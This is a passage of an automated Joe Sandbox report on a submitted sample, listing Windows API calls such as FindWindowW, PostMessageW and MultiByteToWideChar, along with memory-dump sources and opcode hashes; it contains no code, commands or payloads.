                                        • Instruction ID: 56c331dad8eacc11875bc71e0369f59d3033eb8e73c2c084c9a8479dd7fb03cc
                                        • Opcode Fuzzy Hash: f1ed0a0d32d812df7def5fee383d8730a16ad6f31804dd0ad81966b3601b2016
                                        • Instruction Fuzzy Hash: C7E06D742013018FE7709FB8D4083427BE4BB00740F008A2DE8D6C6A92DBF5E4848BD1
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: LocalTime
                                        • String ID: %.3d$X64
                                        • API String ID: 481472006-1077770165
                                        • Opcode ID: b13d9f240d9b5bc33ccc9c692ebd6f7cc75b78a096c8fbc373071c250d1e35f4
                                        • Instruction ID: 2729155da94a7959912dcffdb030cd678859fa7caaf0960d3d33959167abde7f
                                        • Opcode Fuzzy Hash: b13d9f240d9b5bc33ccc9c692ebd6f7cc75b78a096c8fbc373071c250d1e35f4
                                        • Instruction Fuzzy Hash: B4D062A1C09119E9CB70A7E0DC45EBEB3BCFB29341F508577F94692041D734D5496B61
                                        APIs
                                        • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0010232C
                                        • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 0010233F
                                          • Part of subcall function 000DE97B: Sleep.KERNEL32 ref: 000DE9F3
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: FindMessagePostSleepWindow
                                        • String ID: Shell_TrayWnd
                                        • API String ID: 529655941-2988720461
                                        • Opcode ID: 9281283749ff1a0227f262672bef1e0a20e573aa08a62e1427508c0afaf84928
                                        • Instruction ID: 8f07c9016da673ede17fa9724ff93a46ad6ba727457901ce2132e23fabba17ce
                                        • Opcode Fuzzy Hash: 9281283749ff1a0227f262672bef1e0a20e573aa08a62e1427508c0afaf84928
                                        • Instruction Fuzzy Hash: 93D01276395350B7E678B770DC1FFC6BA189B00B14F108A167785AA2D1C9F0A841CEA4
                                        APIs
                                        • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0010236C
                                        • PostMessageW.USER32(00000000), ref: 00102373
                                          • Part of subcall function 000DE97B: Sleep.KERNEL32 ref: 000DE9F3
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: FindMessagePostSleepWindow
                                        • String ID: Shell_TrayWnd
                                        • API String ID: 529655941-2988720461
                                        • Opcode ID: 564331b9d49b0fa6c45af1408579087598d4aa9f05a93fc169fa057d056f0b7d
                                        • Instruction ID: 3a76c9457b6bcddb83951d071de5900bf0be2cb7be165bb7b3a915b738ca04e0
                                        • Opcode Fuzzy Hash: 564331b9d49b0fa6c45af1408579087598d4aa9f05a93fc169fa057d056f0b7d
                                        • Instruction Fuzzy Hash: A2D0C9763913507AE668B770DC0FFC6B6189B04B14F508A167685AA2D1C9E0A8418EA4
                                        APIs
                                        • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,?,?,00000000,?,?,?,?,?,00000000,?), ref: 000ABE93
                                        • GetLastError.KERNEL32 ref: 000ABEA1
                                        • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 000ABEFC
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: ByteCharMultiWide$ErrorLast
                                        • String ID:
                                        • API String ID: 1717984340-0
                                        • Opcode ID: 24370069d718fd2f0cd3afd6a04aed515e51d7c15568342b06ac17e32b1d9e2f
                                        • Instruction ID: c82644ddaf39c06059a29b2cb40ec8d292efd8bbfd94ce6fd40797b1cf16a451
                                        • Opcode Fuzzy Hash: 24370069d718fd2f0cd3afd6a04aed515e51d7c15568342b06ac17e32b1d9e2f
                                        • Instruction Fuzzy Hash: 6E41AF34605246AFCF618FE4CC54AAABBE5AF43320F184269F9599B1A3DB308D01DB60